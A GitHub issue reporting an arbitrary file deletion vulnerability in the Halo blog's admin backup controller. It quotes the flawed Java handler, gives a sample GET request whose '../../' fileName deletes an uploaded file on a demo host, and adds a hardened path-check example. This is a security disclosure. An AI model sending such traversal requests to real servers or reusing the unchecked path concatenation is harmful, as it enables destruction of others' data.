Any file deletion in the background #136

Closed
5 of 6 tasks
kingz40o opened this issue Apr 4, 2019 · 2 comments
Labels
vulnerability Vulnerability

Comments

kingz40o commented Apr 4, 2019

I confirm that I have checked (mark with [ ] / [x])


I want to request (mark with [ ] / [x])

  • Bug report
  • Add a new feature or function
  • Request technical support

There is an arbitrary file deletion vulnerability in backup file deletion.

    // Handler quoted from Halo's admin backup controller. FileUtil, JsonResult,
    // ResultCodeEnum and localeMessageUtil are the project's own classes, not shown here.
    @GetMapping(value = "delBackup")
    @ResponseBody
    public JsonResult delBackup(@RequestParam("fileName") String fileName,
                                @RequestParam("type") String type) {
        // Both request parameters are concatenated into the path unchecked, so "../" in either
        // one walks out of $HOME/halo/backup/ and FileUtil.del() removes whatever the path resolves to.
        final String srcPath = System.getProperties().getProperty("user.home") + "/halo/backup/" + type + "/" + fileName;
        try {
            FileUtil.del(srcPath);
            return new JsonResult(ResultCodeEnum.SUCCESS.getCode(), localeMessageUtil.getMessage("code.admin.common.delete-success"));
        } catch (Exception e) {
            return new JsonResult(ResultCodeEnum.FAIL.getCode(), localeMessageUtil.getMessage("code.admin.common.delete-failed"));
        }
    }

e.g.

GET /admin/backup/delBackup?type=posts&fileName=../../upload/2019/3/veer-15238236420190404102850332.jpg HTTP/1.1
Host: demo.halo.run
Connection: close
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
Referer: https://demo.halo.run/admin/backup?type=posts
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=jLIF44HA_8IHwVFhq66-jAArsdL3Mtz_tg2GvNhO

The vulnerability was discovered by Chaitin Tech.
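As an added example (not Halo's code and not part of the report above), the concatenation from the quoted handler is shown next to a hardened resolver in plain Java on java.nio.file, with no Spring dependency. The backup root mirrors the $HOME/halo/backup layout in the issue; the class name, the method names and the legitimate file name posts-20190404.zip are assumptions for illustration. The unsafe variant is kept only to show where the fileName from the request actually lands; nothing is deleted.

```java
import java.io.File;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;

/**
 * Added example, not Halo's code: the vulnerable path construction from the issue
 * beside a hardened version. The "legit" file name in main() is constructed.
 */
public class BackupPathCheck {

    // Same root as the reported controller: $HOME/halo/backup
    static final Path BACKUP_ROOT =
            Paths.get(System.getProperty("user.home"), "halo", "backup").toAbsolutePath().normalize();

    /** Vulnerable: plain concatenation, as in delBackup(). "../" in either parameter escapes the root. */
    static Path unsafeResolve(String type, String fileName) {
        return Paths.get(System.getProperty("user.home") + "/halo/backup/" + type + "/" + fileName);
    }

    /** Hardened: each parameter must be a single path element, and the result must stay under the root. */
    static Path safeResolve(String type, String fileName) {
        requireSingleComponent(type, "type");
        requireSingleComponent(fileName, "fileName");

        Path target = BACKUP_ROOT.resolve(type).resolve(fileName).normalize();

        // Defence in depth: Path.startsWith compares whole components (a String prefix check would
        // accept a sibling such as ".../backup2"), and the depth check pins the shape <root>/<type>/<file>.
        if (!target.startsWith(BACKUP_ROOT) || target.getNameCount() != BACKUP_ROOT.getNameCount() + 2) {
            throw new IllegalArgumentException("path escapes backup directory: " + target);
        }
        // A symlink planted inside the backup directory could still point elsewhere; refuse to follow it.
        if (Files.isSymbolicLink(target)) {
            throw new IllegalArgumentException("refusing to operate on symbolic link: " + target);
        }
        return target;
    }

    /** Rejects anything that is not one plain file or directory name. */
    private static void requireSingleComponent(String value, String name) {
        if (value == null || value.isEmpty() || ".".equals(value) || "..".equals(value)
                || value.indexOf('/') >= 0 || value.indexOf('\\') >= 0
                || value.indexOf(File.separatorChar) >= 0 || value.indexOf('\0') >= 0) {
            throw new IllegalArgumentException(name + " must be a single file name, got: " + value);
        }
    }

    public static void main(String[] args) {
        // The parameters from the request in the issue.
        String type = "posts";
        String traversal = "../../upload/2019/3/veer-15238236420190404102850332.jpg";
        // Constructed legitimate name for comparison (assumption, not a real backup file).
        String legit = "posts-20190404.zip";

        System.out.println("unsafe -> " + unsafeResolve(type, traversal).normalize());
        for (String name : new String[] {legit, traversal}) {
            try {
                System.out.println("safe   -> " + safeResolve(type, name));
            } catch (IllegalArgumentException e) {
                System.out.println("safe   -> rejected: " + e.getMessage());
            }
        }
    }
}
```

Compile and run with javac BackupPathCheck.java && java BackupPathCheck. The unsafe line shows the request's fileName resolving to a file under $HOME/halo/upload/, outside the backup directory, which is exactly what the report's GET request deletes; the hardened resolver rejects it at the component check, and the containment and depth checks remain as a second layer for anything that check misses. In the real handler, type should additionally be matched against the fixed set of backup types the application supports rather than accepted as free text.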

@JohnNiang JohnNiang added the vulnerability Vulnerability label Apr 5, 2019
ruibaby (Member) commented May 28, 2019

Preparing to release v1, so closing this issue.

@ruibaby ruibaby closed this as completed May 28, 2019

JohnNiang pushed a commit to JohnNiang/halo that referenced this issue Mar 2, 2023
…alo-dev#136)

Bumps [filepond-plugin-image-preview](https://github.com/pqina/filepond-plugin-image-preview) from 4.6.1 to 4.6.2.
- [Release notes](https://github.com/pqina/filepond-plugin-image-preview/releases)
- [Commits](pqina/filepond-plugin-image-preview@4.6.1...4.6.2)

Signed-off-by: dependabot-preview[bot] <support@dependabot.com>

Co-authored-by: dependabot-preview[bot] <27856297+dependabot-preview[bot]@users.noreply.github.com>